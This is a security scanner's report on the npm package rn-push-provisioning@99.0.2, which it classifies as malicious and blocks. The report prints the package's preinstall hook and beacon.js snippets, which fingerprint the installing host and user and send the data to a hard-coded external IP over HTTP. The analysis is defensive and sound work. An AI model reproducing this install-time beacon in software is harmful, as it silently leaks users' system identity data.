---
canonical: "https://firewall.lpm.dev/npm/rn-push-provisioning/v/99.0.2"
markdown: "https://firewall.lpm.dev/npm/rn-push-provisioning/v/99.0.2.md"
package: "rn-push-provisioning"
report_status: "published"
title: "rn-push-provisioning@99.0.2 npm security report"
verdict: "malicious"
version: "99.0.2"
---

# rn-push-provisioning@99.0.2 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — Leaks the installing host name, user name, platform, and CPU architecture to a third party.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Data Exfiltration
- **Selected version:** 99.0.2
- **Selected version is latest:** Yes
- **Analysis source:** AI Security Review (lpm-firewall-ai)

Installation silently fingerprints the machine and transmits the data to an external server. Errors are suppressed and the lifecycle command is allowed to succeed.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Verdict:** Malicious
- **Confidence:** 99.0%
- **Started:** 2026-08-27T05:49:50.748Z
- **Finished:** 2026-08-27T05:50:17.974Z
- **Download time:** 506 ms
- **Static scan time:** 11 ms
- **AI review time:** 26708 ms
- **Total time:** 27226 ms

## Security analysis

### Published attack-surface review

- **Summary:** Installation silently fingerprints the machine and transmits the data to an external server. Errors are suppressed and the lifecycle command is allowed to succeed.

- **Trigger:** npm installation, before the package is installed.

- **Impact:** Leaks the installing host name, user name, platform, and CPU architecture to a third party.

- **Evidence paths:** package.json, beacon.js, index.js

- **Review source:** ai\_review

- **Reviewed:** 2026-08-27T05:50:17.974Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** Preinstall host fingerprinting and HTTP exfiltration.

- **Attack narrative:** When npm installs the package, its preinstall hook executes beacon.js. The script gathers local host and user identifiers plus platform metadata, then sends them to a hard-coded IP address over unencrypted HTTP. The hook suppresses network errors and uses a shell fallback so installation can continue without notifying the user.

- **Rationale:** This is unconsented install-time collection and transmission of local system identity data to a hard-coded external endpoint. The package has no legitimate implementation beyond this beacon.

- **Files touched:** package.json, beacon.js

- **Network endpoints:** http://104.236.2.79:8888/npm-install

### Review decision

- **Verdict:** Malicious

- **Confidence:** 99.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for:** A preinstall hook runs beacon.js during npm installation., The install script collects the host name, local user name, platform, and CPU architecture., It sends the collected device data to a hard-coded external HTTP endpoint.

- **Evidence against:** The package contains no additional runtime functionality or payload files., No credential files, environment variables, shell commands, or destructive actions were found.

## Public findings

### 1. High: Install Time Lifecycle Scripts
- **Category:** Manifest
- **Confidence:** 90.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/rn-push-provisioning@99.0.2/package.json>)

Package defines install-time lifecycle scripts.

Public source snippet (untrusted):

```json
scripts.preinstall = node beacon.js || true
```

### 2. Medium: Ambiguous Install Lifecycle Script
- **Category:** Manifest
- **Confidence:** 75.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/rn-push-provisioning@99.0.2/package.json>)

Install-time lifecycle script is not statically allowlisted and needs review.

Public source snippet (untrusted):

```json
scripts.preinstall = node beacon.js || true
```

### 3. Low: Scripts Present
- **Category:** Manifest
- **Confidence:** 100.0%

Package declares npm scripts.

### 4. Medium: Network
- **Category:** Source
- **Confidence:** 75.0%

Package source references network APIs.

### 5. Low: Url Strings
- **Category:** Supply Chain
- **Confidence:** 65.0%

Package source contains URL literals.

### 6. High: Suspicious Lifecycle Evidence
- **Category:** Manifest
- **Confidence:** 99.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/rn-push-provisioning@99.0.2/package.json>)

A preinstall hook runs beacon.js during npm installation.

Public source snippet (untrusted):

```json
"scripts": {
    "preinstall": "node beacon.js || true"
  }
```

### 7. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** beacon.js
- **Public source:** [View source](<https://unpkg.com/rn-push-provisioning@99.0.2/beacon.js>)

The install script collects the host name, local user name, platform, and CPU architecture.

Public source snippet (untrusted):

```javascript
var q = [
    'h=' + encodeURIComponent(os.hostname()),
    'u=' + encodeURIComponent(os.userInfo().username),
    'p=' + process.platform,
    'a=' + process.arch
  ].join('&');
```

### 8. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** beacon.js
- **Public source:** [View source](<https://unpkg.com/rn-push-provisioning@99.0.2/beacon.js>)

It sends the collected device data to a hard-coded external HTTP endpoint.

Public source snippet (untrusted):

```javascript
http.get('http://104.236.2.79:8888/npm-install?' + q, function(r) {
    r.resume();
  }).on('error', function() {});
```

## Dependencies and install lifecycle
- **Lifecycle scripts present:** Yes
- **Published lifecycle scripts:** preinstall
- **Dependencies:** 0
- **Optional dependencies:** 0
- **Peer dependencies:** 0
- **Development dependencies:** 0
- **Published dependency-graph edges:** 0

## Package metadata
- **Package:** rn-push-provisioning
- **Ecosystem:** npm
- **Version:** 99.0.2
- **License:** ISC
- **Version published:** 2026-08-27T05:30:50.720Z
- **Package first seen:** 2026-08-27T05:50:17.974Z
- **Package last seen:** 2026-08-27T05:50:20.080Z
- **Known versions:** 2
- **Latest version:** 99.0.2
- **Appeal under review:** No
- **Description:** Security research - dependency confusion proof of concept. Contact: liquid2@liquidsec.net
- **Author:** liquidsec2
- **Artifact files:** 3
- **Artifact unpacked size:** 790 bytes
- **Artifact signatures:** 1
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/rn-push-provisioning/v/99.0.2>)
